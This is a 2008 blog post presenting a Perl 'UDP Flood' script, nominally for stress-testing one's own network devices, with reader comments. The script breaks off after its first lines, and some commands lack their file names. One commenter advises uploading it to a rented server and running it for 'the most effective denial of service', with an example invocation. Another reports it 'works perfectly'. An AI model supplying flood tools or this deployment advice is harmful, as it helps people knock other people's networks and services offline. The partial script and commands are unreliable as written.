Sunday, June 8, 2008

UDP Flood perl script

Have u ever wonder how your network devices(s) behavior in stress state?
Try follow this simple steps to make UDP Flood :

1. touch /tmp/
2. chmod +x /tmp/
3. copy & paste this to ur script :


# udp flood.

use Socket;
use strict;

if ($#ARGV != 3) {
print "


Anonymous said...

how and where do u compile these scripts ??

Anonymous said...

you can run it on your home computer via Terminal bash or CMD prompt but for the most effective denial of service i would upload script to root directory of a Virtual private server of some kind (via SFTP) and exec the script in SSH specifying the values as such;; perl host/ip packetsize time

an example of a flood would be:

perl 80 1024 60

Unknown said...

It works perfectly...

Thanx a lot..